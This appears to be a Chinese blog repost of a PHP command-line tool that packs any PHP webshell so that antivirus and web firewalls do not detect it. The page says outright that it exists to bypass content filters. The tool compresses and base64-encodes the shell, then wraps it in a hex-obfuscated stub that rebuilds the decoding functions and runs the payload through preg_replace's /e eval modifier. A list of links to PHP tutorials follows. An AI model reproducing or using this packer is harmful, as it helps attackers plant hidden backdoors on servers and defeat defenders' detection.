php shell超强免杀、减少体积工具实现代码
2015-01-24信息快讯网
这不是webshell,只是个webshell免杀工具,切勿当初webshell使用,仅限免杀phpwebshell
lostwolf写的这不是webshell,只是个webshell免杀工具
切勿当初webshell使用
仅限免杀phpwebshell
该工具运行在 cli 模式!
如果有无法突破的文件内容过滤 可尝试下用这个工具 免杀大马!
任意php webshell 通过此工具编码之后可以饶过国内一些bt的防火墙
<?php
/*
Title: PHP shell nokill T00L
Blog: exploit-db.blogcn.com
*/
error_reporting(0);
@ini_set('memory_limit','-1');
set_time_limit(0);
$toolname="$argv[0]";
if ($argc<2) {
baner($toolname);
die;
}
$input_file= trim($argv[1]);
$output_file='nokill_'.$input_file;
if (file_exists($input_file)) {
No_kill_c0de($input_file,$output_file);
echo "PHP shell nokill T00L\r\n";
echo "Blog: exploit-db.blogcn.com\r\n";
echo "Input: {$input_file}\r\n";
$file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file;
echo "[+] Generate success!\r\n";
echo "Saved to {$file_full_path}"."\r\n";
} else {
echo "PHP shell nokill T00L\r\n";
echo "Blog: exploit-db.blogcn.com\r\n";
die("[-] Failed ! The File $input_file does not exist");
}
function No_kill_c0de($input_file,$output_file){
$no_whitespace=php_strip_whitespace($input_file);
$no_php_tag=trim(trim(trim($no_whitespace,'<?php'),'<?'),'?>');
$enfile=base64_encode(gzdeflate($no_php_tag));
$shellcode="\x3c\x3f\x70\x68\x70\xd\xa";
$shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."\xd\xa";
$shellcode.="\x24\x62\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x66\x27\x2c\x22\x22\x2c\x22\x62\x66\x61\x66\x73\x66\x65\x66\x36\x66\x34\x66\x5f\x66\x66\x64\x66\x66\x65\x66\x66\x63\x66\x66\x6f\x66\x66\x64\x66\x66\x65\x66\x22\x29\x3b\xd\xa\x24\x67\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x58\x27\x2c\x27\x27\x2c\x27\x67\x58\x58\x7a\x58\x58\x69\x58\x58\x6e\x58\x58\x58\x58\x66\x58\x58\x58\x6c\x58\x58\x61\x58\x58\x58\x74\x58\x58\x58\x58\x58\x65\x27\x29\x3b\xd\xa\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x5c\x27\x61\x5c\x27\x65\x69\x73\x27\x2c\x27\x65\x27\x2e\x27\x76\x27\x2e\x27\x61\x27\x2e\x27\x6c\x27\x2e\x27\x28\x24\x67\x28\x24\x62\x28\x24\x65\x6e\x66\x69\x6c\x65\x29\x29\x29\x27\x2c\x27\x61\x27\x29\x3b\xd\xa";
$shellcode.="\x3f\x3e";
file_put_contents("$output_file",$shellcode);
}
function baner($toolname){
echo "PHP shell nokill T00L\r\n";
echo "Blog: exploit-db.blogcn.com\r\n";
echo "Usage: {$toolname} phpwebshell\r\n";
}
?>
解析PHP中empty is_null和isset的测试
浅析Dos下运行php.exe,出现没有找到php_mbstring.dll 错误的解决方法
php selectradio和checkbox默认选择的实现方法详解
php小经验:解析preg_match与preg_match_all 函数
win7下memCache的安装过程(具体操作步骤)
浅析memcache启动以及telnet命令详解
浅析HTTP消息头网页缓存控制以及header常用指令介绍
深入apache配置文件httpd.conf的部分参数说明
解析php中如何直接执行SHELL
解析php扩展php_curl.dll不加载的解决方法
基于php导出到Excel或CSV的详解(附utf8、gbk 编码转换)
解析PHPExcel使用的常用说明以及把PHPExcel整合进CI框架的介绍
php-cli简介(不会Shell语言一样用Shell)
php cc攻击代码与防范方法
PHP中替换换行符的几种方法小结
PHP 正则表达式之正则处理函数小结(preg_match,preg_match_all,preg_replace,preg_split)
PHP中空字符串介绍0、null、empty和false之间的关系
header跳转和include包含问题详解
Windows下部署Apache+PHP+MySQL运行环境实战
php调用dll的实例操作动画与代码分享
PHP连接SQLServer2005的实现方法(附ntwdblib.dll下载)
apache+codeigniter 通过.htcaccess做动态二级域名解析
PHP连接SQLSERVER 注意事项(附dll文件下载)
header中Content-Disposition的作用与使用方法
apache mysql php 源码编译使用方法
PHP教程之PHP中shell脚本的使用方法分享
php木马webshell扫描器代码
PHPExcel读取Excel文件的实现代码
PHP下利用shell后台运行PHP脚本,并获取该脚本的Process ID的代码
PHP 命令行工具 shell_exec, exec, passthru, system详细使用介绍
使用php shell命令合并图片的代码